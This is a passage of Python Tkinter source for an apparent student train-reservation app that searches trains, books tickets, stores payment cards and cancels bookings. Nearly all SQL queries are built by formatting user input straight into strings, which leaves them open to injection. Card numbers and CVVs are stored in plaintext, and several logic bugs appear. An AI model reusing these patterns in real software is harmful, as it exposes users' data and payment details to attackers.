\"SELECT Name FROM STATION\"\n cursor.execute(query)\n results = cursor.fetchall()\n\n option=OptionMenu(frame, self.city, results[0], *results)\n option.grid(row = 0, column = 1, sticky = W)\n\n arriveAt= Label(frame1,text =\"Arrive At\")\n arriveAt.grid(row = 1, column = 0, sticky = E)\n self.arrv = StringVar()\n\n option=OptionMenu(frame1, self.arrv, results[0], *results)\n option.grid(row = 1, column = 1, sticky = W)\n\n depDate= Label(frame2,text =\"Departure Date (YYYY-MM-DD)\")\n depDate.grid(row = 2, column = 0, sticky = E)\n self.date = StringVar()\n\n 
self.startDateEntry = Entry(frame2, textvariable = self.date, width = 10)\n self.startDateEntry.grid(row = 2, column = 1, sticky = W)\n\n b=Button(frame3, text =\"Find Trains\", command = self.departureInfo)\n b.pack(side=RIGHT)\n\n def selected(self):\n if self.v.get() %2 == 0:\n self.value = (floor(self.v.get()/2)) -1\n else:\n self.value = (floor(self.v.get()/2))\n\n def departureInfo(self):\n start_date = datetime.datetime.strptime(self.startDateEntry.get(), '%Y-%m-%d')\n if start_date < datetime.datetime.now():\n messagebox.showerror(\"Error\", \"Invalid Date (Either in the past or start > end)\")\n else:\n self.findAvailWindow.withdraw()\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n\n frame = Frame(self.departureWin)\n frame.pack(side=TOP)\n\n chosenCity = self.city.get()[2: len(self.city.get())-3]\n chosenArrv = self.arrv.get()[2: len(self.arrv.get())-3]\n chosenDate = self.date.get()\n\n server = self.Connect()\n cursor = server.cursor()\n\n stop1 = \"CREATE VIEW Stop1 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenCity)\n stop2 = \"CREATE VIEW Stop2 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenArrv)\n stops = \"CREATE VIEW Stops (Train_Number) AS SELECT Train_Number FROM Stop2 NATURAL JOIN Stop1\"\n query = \"SELECT STOP.Train_Number, STOP.Departure_Time, STOP.Arrival_Time, STOP.Name, TRAIN_ROUTE.First_Class_Price, TRAIN_ROUTE.Second_Class_Price FROM STOP, TRAIN_ROUTE, Stops \\\n WHERE (STOP.Train_Number = Stops.Train_Number) AND (TRAIN_ROUTE.Train_Number = Stops.Train_Number) AND (STOP.Name = '%s' OR STOP.Name = '%s')\" % (chosenCity, chosenArrv)\n\n cursor.execute(query)\n results = cursor.fetchall()\n\n departTime = []\n arriveTime = []\n\n for row in results:\n if str(row[3]) == chosenCity:\n departTime.append((row[1], row[3], row[0], row[4], row[5]))\n if str(row[3]) == chosenArrv:\n arriveTime.append((row[2], row[3], row[0], row[4], row[5]))\n self.duration = []\n for pair1 in departTime:\n for pair2 in arriveTime:\n if pair1[1] == chosenCity and pair2[1] == chosenArrv and pair1[2] == pair2[2]:\n self.duration.append((pair1[2],pair1[0],pair2[0],pair2[0] - pair1[0],pair1[3],pair1[4], pair1[1], pair2[1]))\n # 0: Train_Number, 1: Departure_Time, 2: Arrival_Time, 3: Duration, 4: First_Class_Price, 5: Second_Class_Price, 6: chosenCity, 7: chosenArrv\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 0, column = 0)\n l2 = Label(frame,text = \"Time(self.Duration)\").grid(row = 0, column = 2)\n l3 = Label(frame,text = \"1st Class Price\").grid(row = 0, column = 4)\n l4 = Label(frame,text = \"2nd Class Price\").grid(row = 0, column = 6)\n\n a = 1\n b = 1\n c = 2\n self.v = IntVar()\n for result in self.duration:\n Label(frame, text = str(result[0]), anchor = \"w\").grid(row = a, column = 0, sticky = \"ew\")\n Label(frame, text = str(result[1]) + \"-\" + str(result[2]) + \"\\n\" + str(result[3]), anchor = \"w\").grid(row = a, column = 2, sticky = \"ew\")\n Radiobutton(frame, text = str(result[4]), variable = self.v, value = b, command = self.selected).grid(row = a, column = 4, sticky = \"ew\")\n Radiobutton(frame, text = str(result[5]), variable = self.v, value = c, command = self.selected).grid(row = a, column = 6, sticky = \"ew\")\n a += 1\n b += 2\n c += 2\n\n self.row = a\n self.value1 = b\n self.value2 = c\n\n b1=Button(frame, text =\"Back\", command = self.switchtoSearchTrain)\n b1.grid(row = a, column = 0)\n b2=Button(frame, text =\"Next\", command = 
self.passengerInfo)\n b2.grid(row = a, column = 1)\n\n def switchtoSearchTrain(self):\n self.departureWin.destroy()\n self.findAvailWindow.deiconify()\n\n def passengerInfo(self):\n self.departureWin.withdraw()\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n\n frame = Frame(self.passengerInfoWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.passengerInfoWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.passengerInfoWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.passengerInfoWin)\n frame4.pack(side=TOP)\n\n baggage= Label(frame,text = \"Number of Baggage\")\n baggage.pack(side=LEFT)\n self.bags = IntVar()\n choices = [\"1\", \"2\", \"3\", \"4\"]\n option=OptionMenu(frame, self.bags, choices[0], *choices)\n option.pack(side=RIGHT)\n disclamer = Label(frame2,text = \"Every passenger can bring upto 4 baggage. 2 free of charge, 2 for $30 per bag\")\n disclamer.pack()\n\n passName= Label(frame3,text =\"Passenger Name\")\n passName.pack(side=LEFT)\n self.name2 = StringVar()\n nameEnt = Entry(frame3, textvariable = self.name2, width = 10)\n nameEnt.pack(side = RIGHT)\n\n if self.v.get() % 2 == 0:\n self.classChosen = 2\n else:\n self.classChosen = 1\n\n b1=Button(frame4, text =\"Back\", command = self.switchToDepartureInfo)\n b1.pack(side=LEFT)\n b2=Button(frame4, text =\"Next\", command=self.updateTrainList)\n b2.pack(side=RIGHT)\n\n def switchToDepartureInfo(self):\n self.passengerInfoWin.destroy()\n self.departureWin.deiconify()\n\n def updateTrainList(self):\n price = 0\n if self.bags.get() < 3:\n bagPrice = 0\n else:\n extraBags = self.bags.get() - 2\n bagPrice = extraBags * 30\n if self.v.get()%2 == 0: #(if even 2nd class)\n self.chosenClass = 2\n price = self.duration[self.value][5]\n else:\n self.chosenClass = 1\n price = self.duration[self.value][4]\n\n self.price = StringVar()\n self.price = price + bagPrice\n self.trainChosen = self.duration[self.value][0]\n self.results1.append((self.trainChosen, self.duration[self.value][1], self.duration[self.value][2], self.duration[self.value][3],\n self.duration[self.value][6],self.duration[self.value][7],\n self.chosenClass, self.price, self.bags.get(), self.name2.get()))\n self.makeReservation()\n\n def makeReservation(self):\n self.passengerInfoWin.withdraw()\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n\n frame = Frame(self.reservationWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.reservationWin)\n frame2.pack(side=TOP)\n\n selected = Label(frame,text = \"Currently Selected\")\n selected.grid(row = 0, column = 0)\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 0)\n l2 = Label(frame,text = \"Time(Duration)\").grid(row = 1, column = 1)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 2)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 3)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 4)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =5)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 6)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 7)\n l9 = Label(frame,text = \"Remove\").grid(row = 1, column = 8)\n\n\n a = 2\n b = 1\n self.w = IntVar()\n\n for result in self.results1:\n lb1=Label(frame, text = str(result[0]), anchor = \"w\")\n lb1.grid(row = a, column = 0, sticky = \"ew\")\n lb2=Label(frame, text = str(result[1]) + \"-\" + str(result[2]) +\"\\n\" + str(result[3]), anchor = \"w\")\n lb2.grid(row = a, column = 1, 
sticky = \"ew\")\n lb3=Label(frame, text = str(result[4]), anchor = \"w\")\n lb3.grid(row = a, column = 2, sticky = \"ew\")\n lb4=Label(frame, text = str(result[5]), anchor = \"w\")\n lb4.grid(row = a, column = 3, sticky = \"ew\")\n lb5=Label(frame, text = str(result[6]), anchor = \"w\")\n lb5.grid(row = a, column = 4, sticky = \"ew\")\n lb6=Label(frame, text = str(result[7]), anchor = \"w\")\n lb6.grid(row = a, column = 5, sticky = \"ew\")\n lb7=Label(frame, text = str(result[8]), anchor = \"w\")\n lb7.grid(row = a, column = 6, sticky = \"ew\")\n lb8 = Label(frame, text = str(result[9]), anchor = \"w\")\n lb8.grid(row = a, column = 7, sticky = \"ew\")\n r1 = Radiobutton(frame, text = \"Remove\", variable = self.w, value = b, command = self.select2)\n r1.grid(row = a, column = 8,sticky = \"ew\")\n a = a + 1\n b += 9\n\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT Student_Discount FROM SYSTEM_INFO\"\n cursor.execute(query)\n res = cursor.fetchall()\n discount = res[0][0]\n\n query = \"SELECT Is_student FROM CUSTOMER WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n result3 = cursor.fetchone()\n temp_price = 0\n for entry in self.results1:\n temp_price += entry[7]\n self.price = temp_price\n print(result3[0])\n if result3[0] == 1:\n self.price = self.price*(1-discount/100)\n\n\n stuDis= Label(frame2,text = \"Student Discount Applied.\")\n stuDis.grid(row = 0, column = 0)\n totalC= Label(frame2, text = \"Total Cost\")\n totalC.grid(row = 1, column = 0)\n #cost = StringVar()\n costEnt = Label(frame2, text = self.price, width = 10)\n costEnt.grid(row = 1, column = 1)\n\n useCard= Label(frame2, text = \"Use Card\")\n useCard.grid(row = 4, column = 0)\n\n query = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n results = cursor.fetchall()\n newRes = []\n for res in results:\n newRes.append(int(res[0]))\n\n self.card = IntVar()\n option=OptionMenu(frame2, self.card, newRes[0], *newRes)\n option.grid(row = 4, column = 1)\n\n b5=Button(frame2, text =\"Delete Card\", command = self.deleteCard)\n b5.grid(row = 4, column =2)\n b1=Button(frame2, text =\"Add Card\", command = self.addCard)\n b1.grid(row = 4, column =3)\n\n b2=Button(frame2, text =\"Continue adding a train\", command = self.switchToSearch)\n b2.grid(row = 5, column = 0)\n\n b3=Button(frame2, text =\"Back\", command = self.switchToPassengerInfo)\n b3.grid(row = 6, column = 0)\n b4=Button(frame2, text =\"Submit\", command = self.confirmation)\n b4.grid(row =6, column = 1)\n\n def switchToSearch(self):\n self.reservationWin.destroy()\n self.searchTrain()\n\n def switchToPassengerInfo(self):\n self.reservationWin. 
destroy()\n self.passengerInfoWin.deiconify()\n\n## def getCost(self):\n## total = 0\n## for button in self.checkButtonsInDetails:\n## if button.is_checked():\n## total += button.selectRoom()[5]\n## total += button.selectRoom()[2]\n## self.totalCost = total*self.numDays\n## totallabel5 = Label(self.checkDetailsFrame, text=str(self.totalCost))\n## self.totalCostVarLabel.pack(side=TOP)\n## totallabel5.pack(side=TOP)\n\n def addCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n\n frame = Frame(self.paymentIWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.paymentIWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.paymentIWin)\n frame4.pack(side=TOP)\n frame5 = Frame(self.paymentIWin)\n frame5.pack(side=TOP)\n\n l1= Label(frame,text = \"Name on Card\")\n l1.pack(side=LEFT)\n l2= Label(frame2,text = \"Card Number\")\n l2.pack(side=LEFT)\n l3= Label(frame3,text = \"CVV\")\n l3.pack(side=LEFT)\n l4= Label(frame4,text = \"Expiration Date\")\n l4.pack(side=LEFT)\n\n self.name = StringVar()\n cardName = Entry(frame, textvariable = self.name, width = 10)\n cardName.pack(side = RIGHT)\n\n self.num = StringVar()\n cardNum = Entry(frame2, textvariable = self.num, width = 10)\n cardNum.pack(side = RIGHT)\n\n self.CVVnum = StringVar()\n Cvv = Entry(frame3, textvariable = self.CVVnum, width = 10)\n Cvv.pack(side = RIGHT)\n\n self.date1 = StringVar()\n expdate = Entry(frame4, textvariable = self.date1, width = 10)\n expdate.pack(side = RIGHT)\n\n b4=Button(frame5, text =\"Submit\", command = self.addCardCheck)\n b4.pack(side=LEFT)\n\n def addCardCheck(self):\n self.expDate = datetime.datetime.strptime(self.date1.get(), '%Y-%m-%d')\n if self.expDate <= datetime.datetime.now():\n messagebox.showerror(\"Error, your card is expired.\")\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM PAYMENT_INFO \\\n WHERE Card_Number = '%s'\" % (self.num.get())\n cursor.execute(query)\n results = cursor.fetchall()\n if len(results) != 0:\n messagebox.showerror(\"Error\", \"Card number already in use\")\n return\n elif self.expDate == \"\" or self.name.get() == \"\" or self.num.get() == \"\" or self.CVVnum.get() == \"\":\n messagebox.showerror(\"Error\", \"Expiration Date, Name, Number, and CVV must be filled\")\n return\n elif len(self.num.get()) != 10:\n messagebox.showerror(\"Error\", \"Card Number must be 10 digits\")\n return\n elif len(self.CVVnum.get()) != 3:\n messagebox.showerror(\"Error\", \"CVV must be 3 digits\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"INSERT INTO PAYMENT_INFO(Card_Number, CVV, Exp_Date, Name_on_card, Username) VALUES ('%s', '%s', '%s', '%s', '%s')\" % (self.num.get(), self.CVVnum.get(), self.expDate, self.name.get(), self.username.get())\n cursor.execute(query)\n result = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin.destroy()\n self.makeReservation()\n\n def deleteCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin2= Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n\n frame = Frame(self.paymentIWin2)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin2)\n frame2.pack(side=BOTTOM)\n cardNum = Label(frame, text = \"Card Number\")\n cardNum.pack(side=LEFT)\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query1)\n results = 
cursor.fetchall()\n\n self.cardNum = StringVar()\n self.cardNum.set(results[0][0])\n\n option=OptionMenu(frame, self.cardNum, results[0], * results)\n option.pack(side=RIGHT)\n\n b1=Button(frame2, text =\"Submit\", command = self.deleteCardCheck)\n b1.pack(side=BOTTOM)\n\n self.cardNum = int(self.cardNum.get()[1:11])\n\n def deleteCardCheck(self):\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Is_cancelled, Departure_Date FROM RESERVATION NATURAL JOIN RESERVES WHERE Card_Number ='%s'\" % (self.cardNum)\n cursor.execute(query1)\n results = cursor.fetchall()\n for row in results:\n self.departDate = row[1]\n if self.departDate >= datetime.datetime.today() and row[0] == 0:\n messagebox.showerror(\"Error\", \"Card is being used for existing reservation\")\n return\n\n query2 = \"DELETE FROM PAYMENT_INFO WHERE Card_Number = '%s'\" % (self.cardNum)\n cursor.execute(query2)\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin2.destroy()\n self.makeReservation()\n\n def switchToConfirm1(self):\n self.paymentIWin.withdraw()\n self.confirmation()\n\n def switchToConfirm2(self):\n self.paymentIWin2.withdraw()\n self.confirmation()\n\n def backToMain(self):\n self.confirm.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def select2(self):\n self.index = floor(self.w.get()/9)\n self.results1.remove(self.results1[self.index])\n self.reservationWin.destroy()\n self.makeReservation()\n\n def confirmation(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT MAX(ReservationID) FROM RESERVATION\"\n cursor.execute(query)\n maxID = cursor.fetchall()\n self.newReservationID = maxID[0][0] + 1;\n\n query1 = \"INSERT INTO RESERVATION(ReservationID, Is_cancelled, Username, Card_Number) VALUES ('%d', 0, '%s', '%d')\" % (self.newReservationID, self.username.get(),self.card.get())\n cursor.execute(query1)\n\n for res in self.results1:\n query2 = \"INSERT INTO RESERVES(ReservationID, Train_Number, Class, Departure_Date, Passenger_Name, Number_of_Bags, Departs_From, Arrives_At, Total_Cost) \\\n VALUES ('%d', '%d', '%d', '%s', '%s', '%d', '%s', '%s', '%f')\" % (self.newReservationID, self.trainChosen, self.classChosen, self.date.get(), res[9], res[6], res[4], res[5], res[7])\n cursor.execute(query2)\n\n self.reservationWin.destroy()\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n\n frame = Frame(self.confirm)\n frame.pack()\n\n label1 = Label(frame, text = \"Reservation ID:\")\n label1.grid(row = 0, column = 0,sticky=E)\n e1 = Label(frame, text = self.newReservationID, width = 10)\n e1.grid(row = 0, column = 1)\n label3 = Label(frame, text=\"Thank you so much for your purchase! 
Please save the reservation ID for your records.\")\n label3.grid(row = 2, column = 0, columnspan = 2)\n\n query = \"SELECT ReservationID FROM RESERVATION WHERE Card_Number = '%d'\" % (self.card.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n\n self.entries = []\n self.results1 = []\n\n b=Button(frame, text =\"Go back to choose functionality\", command=self.backToMain)\n b.grid(row=3,column=1,sticky=E)\n\n def updateReservation(self):\n self.primaryWindow.destroy()\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n frame = Frame(self.updateWin)\n frame.pack()\n self.resID = IntVar()\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n e1 = Entry(frame, textvariable = self.resID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.updateReservation2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchMainMenu)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchMainMenu(self):\n self.updateWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def update1(self):\n self.index = floor(self.w.get()/9)\n#####################table info, new dept date, change fee, updated cost,#################\n def updateReservation2(self):\n self.updateWin.withdraw()\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin2)\n frame.pack()\n frame2 = Frame(self.updateWin2)\n frame2.pack()\n\n l0 = Label(frame,text = \"Select\").grid(row = 1, column = 0)\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 1)\n l2 = Label(frame,text = \"Date\").grid(row = 1, column = 2)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 3)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 4)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 5)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =6)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 7)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 8)\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n\n a = 2\n b = 1\n self.w = IntVar()\n print(self.results)\n for result in self.results:\n Radiobutton(frame, variable = self.w, value = b, command = self.update1).grid(row = a, column = 0)\n Label(frame, text = str(result[1]), anchor = \"w\").grid(row = a, column = 1, sticky = \"ew\")\n\n l11 = Label(frame, text = str(result[3]), anchor = \"w\")\n l11.grid(row = a, column = 2, sticky = \"ew\")\n l12 = Label(frame, text = str(result[6]), anchor = \"w\")\n l12.grid(row = a, column = 3, sticky = \"ew\")\n l13 = Label(frame, text = str(result[7]), anchor = \"w\")\n l13.grid(row = a, column = 4, sticky = \"ew\")\n l14 = Label(frame, text = str(result[2]), anchor = \"w\")\n l14.grid(row = a, column = 5, sticky = \"ew\")\n l15 =Label(frame, text = str(result[8]), anchor = \"w\")\n l15.grid(row = a, column = 6, sticky = \"ew\")\n l16 = Label(frame, text = str(result[5]), anchor = \"w\")\n l16.grid(row = a, column = 7, sticky = \"ew\")\n l17 = Label(frame, text = str(result[4]), anchor = \"w\")\n l17.grid(row = a, column = 8, sticky = \"ew\")\n a = a + 1\n b += 9\n\n b1 = Button(frame2, text = \"Back\", command = 
self.switchUpdateReservation)\n b1.pack(side = LEFT)\n b2 = Button(frame2, text = \"Next\", command = self.updateReservation3)\n b2.pack(side = RIGHT)\n\n def switchUpdateReservation(self):\n self.updateWin2.destroy()\n #self.updateWin = Toplevel()\n self.updateReservation()\n\n def switchUpdateReservation2(self):\n self.updateWin3.destroy()\n self.updateReservation2()\n\n def updateTree2(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 2, column = 0)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"date\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"date\", text = \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateTree3(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 4, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateDepartureDate(self):\n self.updatedDate = datetime.datetime.strptime(self.date.get(), '%Y-%m-%d')\n\n\n def updateReservation3(self):\n self.updateWin2.withdraw()\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin3)\n frame.pack()\n frame2 = Frame(self.updateWin3)\n frame2.pack()\n frame3 = Frame(self.updateWin3)\n frame3.pack()\n frame4 = Frame(self.updateWin3)\n frame4.pack()\n frame5 = Frame(self.updateWin3)\n frame5.pack()\n\n updateIndex = floor(self.w.get()/9)\n updateTuple = self.results[updateIndex]\n\n l1 = Label(frame, text = \"Current Train Ticket\")\n l1.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree = self.updateTree2(frame2)\n tree.insert('', i, text='', values=(updateTuple[1], updateTuple[3],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n newdepDate= Label(frame3,text =\"New Departure Date\")\n newdepDate.grid(row = 0, column = 0, sticky = E)\n self.date = StringVar() ## assume YYYY-MM-DD\n e1= Entry(frame3,textvariable = self.date, width = 10)\n e1.grid(row = 0, column = 1, sticky = EW)\n self.updatedDate = updateTuple[3]\n b1 = Button(frame3, text = \"Search availability\", command = self.updateDepartureDate)\n b1.grid(row = 0, column = 2, sticky = EW)\n\n\n l2 = Label(frame3, text = \"Updated Train Ticket\")\n l2.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree2 = self.updateTree3(frame4)\n tree2.insert('', i, text='', values=(updateTuple[1],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n\n\n\n server = self.Connect()\n cursor = server.cursor()\n query2 = \"SELECT Change_fee FROM SYSTEM_INFO\"\n cursor.execute(query2)\n changefee = cursor.fetchone()\n change_fee = changefee[0]\n query4 = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query4)\n self.results = cursor.fetchall()\n query3 = \"SELECT Total_Cost FROM 
RESERVES WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.resID.get(), self.results[self.index][1])\n cursor.execute(query3)\n totalcost = cursor.fetchone()\n self.total_cost = totalcost[0]\n self.total_cost = self.total_cost + change_fee\n print (type(self.total_cost))\n\n changeFee = Label(frame5,text =\"Change Fee\")\n changeFee.grid(row = 0, column = 0, sticky = E)\n self.value = StringVar()\n e2 = Label(frame5,text = change_fee, width = 10)\n e2.grid(row = 0, column = 1, sticky = E)\n updatedCost = Label(frame5,text =\"Updated Total Cost\")\n updatedCost.grid(row = 1, column = 0, sticky = E)\n e3 = Label(frame5, text = self.total_cost, width = 10)\n e3.grid(row = 1, column = 1)\n\n\n b2=Button(frame5, text =\"Back\", command = self.switchUpdateReservation2)\n b2.grid(row =2, column = 0, sticky = E)\n b3=Button(frame5, text =\"Submit\", command = self.submit)\n b3.grid(row =2, column = 1, sticky = E)\n\n\n def submit(self):\n self.updateWin3.destroy()\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"UPDATE RESERVES SET RESERVES.Departure_Date = '%s', RESERVES.Total_Cost = '%d' WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.updatedDate, self.total_cost, self.resID.get(), self.results[self.index][1])\n cursor.execute(query1)\n cursor.close()\n server.commit()\n server.close()\n self.mainMenu()\n\n def cancelRes(self):\n self.primaryWindow.withdraw()\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin)\n frame.pack()\n\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n self.cancelID = IntVar()\n e1 = Entry(frame, text = self.cancelID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.cancelRes2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchToMain)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchToMain(self):\n self.cancelWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def updateTree4(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 0, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"Date\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"Date\", text= \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def cancelRes2(self):\n self.cancelWin.destroy()\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin2)\n frame.pack()\n frame2 = Frame(self.cancelWin2)\n frame2.pack()\n frame3 = Frame(self.cancelWin2)\n frame3.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.cancelID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n if len(self.results) == 0:\n messagebox.showerror(\"Error\", \"Reservation already cancelled, cannot cancel again\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n\n i = 0\n self.delPrice = 0\n tree = self.updateTree4(frame)\n dates = []\n for res in self.results:\n tree.insert('', i, text='', values=(res[1], res[3], res[6],res[7], res[2], res[8], res[5],res[4]))\n 
self.delPrice += res[8]\n dates.append(res[3])\n i += 1\n self.departDate = min(dates)\n\n l1= Label(frame2,text =\"Total Cost of Reservation\")\n l1.grid(row = 1, column = 0, sticky = E)\n\n e1= Label(frame2,text = self.delPrice, width = 10)\n e1.grid(row = 1, column = 1, sticky = EW)\n\n #self.cancelDate = datetime.today()\n self.cancelDate = datetime.date.today()\n l2 = Label(frame2, text = \"Date of Cancellation\")\n l2.grid(row = 2, column = 0, sticky = E)\n e2= Label(frame2,text = self.cancelDate, width = 10)\n e2.grid(row = 2, column = 1, sticky = EW)\n\n if self.cancelDate < (self.departDate - datetime.timedelta(7)):\n self.refund = float(self.delPrice) * 0.8 - 50.0\n elif self.cancelDate < (self.departDate - datetime.timedelta(1)) and (self.cancelDate > (self.departDate - datetime.timedelta(7))):\n self.refund = float(self.delPrice) * 0.5 - 50\n elif self.cancelDate > (self.departDate - datetime.timedelta(1)):\n self.refund = 0\n messagebox.showerror(\"Error\", \"Cannot cancel reservation within a day of departure date\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n elif self.refund < 0:\n self.refund = 0\n\n l3 = Label(frame2, text = \"Amount to be Refunded\")\n l3.grid(row = 3, column = 0, sticky = E)\n e2= Label(frame2,text = self.refund, width = 10)\n e2.grid(row = 3, column = 1, sticky = EW)\n\n b2=Button(frame3, text =\"Back\", command = self.switchCancelRes1)\n b2.grid(row =4, column = 0, sticky = E)\n\n b3=Button(frame3, text =\"Submit\", command = self.switchTC)\n b3.grid(row =4, column = 1, sticky = E)\n\n def switchCancelRes1(self):\n self.cancelWin2.destroy()\n self.cancelRes()\n\n def switchTC(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT Is_cancelled, MIN(Departure_Date) FROM RESERVATION, RESERVES WHERE RESERVES.ReservationID = '%d' AND RESERVATION.ReservationID = '%d'\" % (self.cancelID.get(), self.cancelID.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n queryCancel = \"UPDATE RESERVATION SET Is_cancelled = 1 WHERE ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(queryCancel)\n query = \"DELETE FROM RESERVES WHERE RESERVES.ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(query)\n\n cursor.close()\n server.commit()\n server.close()\n self.cancelWin2.destroy()\n self.primaryWindow.destroy()\n self.primaryWin.destroy()\n self.primaryWindow = Toplevel()\n 